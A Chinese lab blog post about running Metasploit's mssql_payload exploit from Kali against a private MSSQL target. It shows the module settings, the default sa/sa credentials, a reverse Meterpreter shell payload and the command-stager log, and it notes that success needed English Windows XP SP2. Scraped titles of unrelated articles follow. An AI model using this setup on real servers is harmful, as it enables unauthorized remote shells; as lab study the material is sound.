在kali上做metasploit实验,步骤如下:

msf5 exploit(windows/mssql/mssql_payload) > show options

Module options (exploit/windows/mssql/mssql_payload):

   Name                 Current Setting  Required  Description
---- --------------- -------- -----------
METHOD cmd yes Which payload delivery method to use (ps, cmd, or old)
PASSWORD sa no The password for the specified username
RHOSTS 192.168.0.20 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 1433 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TDSENCRYPTION false yes Use TLS/SSL for TDS data "Force Encryption"
URIPATH no The URI to use for this exploit (default is random)
USERNAME sa no The username to authenticate as
USE_WINDOWS_AUTHENT false yes Use windows authentification (requires DOMAIN option set) Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.0.22 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port Exploit target: Id Name
-- ----
0 Automatic msf5 exploit(windows/mssql/mssql_payload) > exploit [*] Started reverse TCP handler on 192.168.0.22:4444
[*] 192.168.0.20:1433 - The server may have xp_cmdshell disabled, trying to enable it...
[*] 192.168.0.20:1433 - Command Stager progress - 1.47% done (1499/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 2.93% done (2998/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 4.40% done (4497/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 5.86% done (5996/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 7.33% done (7495/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 8.80% done (8994/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 10.26% done (10493/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 11.73% done (11992/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 13.19% done (13491/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 14.66% done (14990/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 16.13% done (16489/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 17.59% done (17988/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 19.06% done (19487/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 20.53% done (20986/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 21.99% done (22485/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 23.46% done (23984/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 24.92% done (25483/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 26.39% done (26982/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 27.86% done (28481/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 29.32% done (29980/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 30.79% done (31479/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 32.25% done (32978/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 33.72% done (34477/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 35.19% done (35976/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 36.65% done (37475/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 38.12% done (38974/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 39.58% done (40473/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 41.05% done (41972/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 42.52% done (43471/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 43.98% done (44970/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 45.45% done (46469/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 46.91% done (47968/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 48.38% done (49467/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 49.85% done (50966/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 51.31% done (52465/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 52.78% done (53964/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 54.24% done (55463/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 55.71% done (56962/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 57.18% done (58461/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 58.64% done (59960/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 60.11% done (61459/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 61.58% done (62958/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 63.04% done (64457/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 64.51% done (65956/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 65.97% done (67455/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 67.44% done (68954/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 68.91% done (70453/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 70.37% done (71952/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 71.84% done (73451/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 73.30% done (74950/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 74.77% done (76449/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 76.24% done (77948/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 77.70% done (79447/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 79.17% done (80946/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 80.63% done (82445/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 82.10% done (83944/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 83.57% done (85443/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 85.03% done (86942/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 86.50% done (88441/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 87.96% done (89940/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 89.43% done (91439/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 90.90% done (92938/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 92.36% done (94437/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 93.83% done (95936/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 95.29% done (97435/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 96.76% done (98934/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 98.19% done (100400/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 99.59% done (101827/102246 bytes)
[*] 192.168.0.20:1433 - Command Stager progress - 100.00% done (102246/102246 bytes)
[*] Exploit completed, but no session was created.
msf5 exploit(windows/mssql/mssql_payload) >

让人闹心的是最后一句话

Exploit completed, but no session was created.

三板斧打完,无法返回shell,我尝试了好多方法,更换靶机操作系统,更换metasploit版本,无论怎么折腾都不行,最后从书上找到答案,靶机要使用windows xp sp2英文版本的,重要事情要说三遍“英文版”、“英文版”、“英文版”。
更换完毕后,果然成功返回了shell。至于其他系统,尤其中文版的,我就不知道怎么搞了。

Exploit completed, but no session was created.的更多相关文章

  1. UI自动化执行时报Parent suite setup failed: SessionNotCreatedException: Message: session not created: This version of ChromeDriver only supports Chrome version 81报错的问题解决

    持续集成在执行UI时报错:Parent suite setup failed: SessionNotCreatedException: Message: session not created: Th ...

  2. Selenium chromeDriver启动时报错:session not created: This version of ChromeDriver only supports Chrome

    解决方案: 这是因为ChromeDriver与本地chrome浏览器的版本不一致导致 ChromeDriver下载地址:http://npm.taobao.org/mirrors/chromedriv ...

  3. 渗透杂记-2013-07-13 windows/mssql/mssql_payload

    扫描一下 Starting Nmap 5.30BETA1 ( http://nmap.org ) at 2011-05-06 09:36 中国标准时间 NSE: Loaded 49 scripts f ...

  4. 《Metasploit魔鬼训练营》第四章(下)

    p163 XSSF 默认kali 2.0中没有xssf,先下载:https://code.google.com/archive/p/xssf/downloads 将下载下来的zip文件解压,将其中的d ...

  5. 2018-2019-2 20165234 《网络对抗技术》 Exp5 MSF基础应用

    实验五 MSF基础应用 实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.一个主动攻击实践,ms08_067(成功) 2. 一个针对浏览器 ...

  6. MSF里MS17_010利用模块笔记

    1.   auxiliary/scanner/smb/smb_ms17_010      //扫描检测漏洞辅助模块 扫描结果这里可以看到 2,3,4这几台主机存在此漏洞! 2.     auxilia ...

  7. 使用metasploit进行栈溢出攻击-5

    我们先尝试使用这个脚本进行攻击: msf > use exploit/linux/myvictim msf exploit(myvictim) > set payload linux/x8 ...

  8. MSF系列--MS17_010利用模块笔记

    1.   auxiliary/scanner/smb/smb_ms17_010      //扫描检测漏洞辅助模块 扫描结果这里可以看到 2,3,4这几台主机存在此漏洞! 2.     auxilia ...

  9. 有趣的后渗透工具 Koadic

    koadic是DEFCON黑客大会上分享出来的的一个后渗透工具,虽然和msf有些相似,但是Koadic主要是通过使用Windows ScriptHost(也称为JScript / VBScript)进 ...

随机推荐

  1. Java Redis+Spring-data-redis 队列 单机版

    1.redis.properties ##redisIP地址 #redis.host=10.14.2.212 redis.host=127.0.0.1 ##redis默认端口号 redis.port= ...

  2. 使用JSP/Servlet技术开发新闻发布系统---Servlet基础

    Servlet简介 什么是Servlet 其实就是一个类,主要负责处理用户的请求和做到数据的相应以及页面的跳转,基于Java技术的Web组件 Servlet API Servlet接口 Servlet ...

  3. 服务器nginx配置显示文件而不是下载

    有时候在服务器上配置某些文件比如TXT文件,在浏览器打开的时候,会弹出下载.如何只让他在浏览器中显示,而不是下载呢.在nginx配置文件中添加一行代码 add_header Content-Type ...

  4. GreenPlum/postgres copy命令导出/导入数据

    一.COPY命令简单实用 1.copy在postgres与GreenPlum介绍 1.1 postgrespostgres的COPY命令可以快速的导出/导入数据到postgresql数据库中,支持常用 ...

  5. 一个milller_rabin模板

    #include <iostream> #include <cstdlib> #include <stdio.h> #include <algorithm&g ...

  6. polyfit 多项式曲线拟合matlab

    polyfit 多项式曲线拟合 全页折叠 语法 p = polyfit(x,y,n) [p,S] = polyfit(x,y,n) [p,S,mu] = polyfit(x,y,n)   说明 示例 ...

  7. Git 相关使用

    https://www.cnblogs.com/mengdd/p/3447464.html 删除本地 & 远程 的分支.   删除本地分支 命令行 : $ git branch -d < ...

  8. 关于.eslintrc.js代码检测的一些配置

    配置参数 rules: { "规则名": [规则值, 规则配置] }  规则值: "off"或者0 //关闭规则关闭 "warn"或者1 / ...

  9. ROS模拟

    亲测,在古月大大这篇博客中的一条命令最好改为rostopic pub /cmd_vel geometry/Twist -r 10 -- '[0.2,0,0]' '[0,0,0.5]'. http:// ...

  10. Android Handler消息处理顺序分析

    看到Handler中的消息处理函数: public void dispatchMessage(Message msg){...} 这个函数是在Looper的执行消息循环loop()的时候取出Messa ...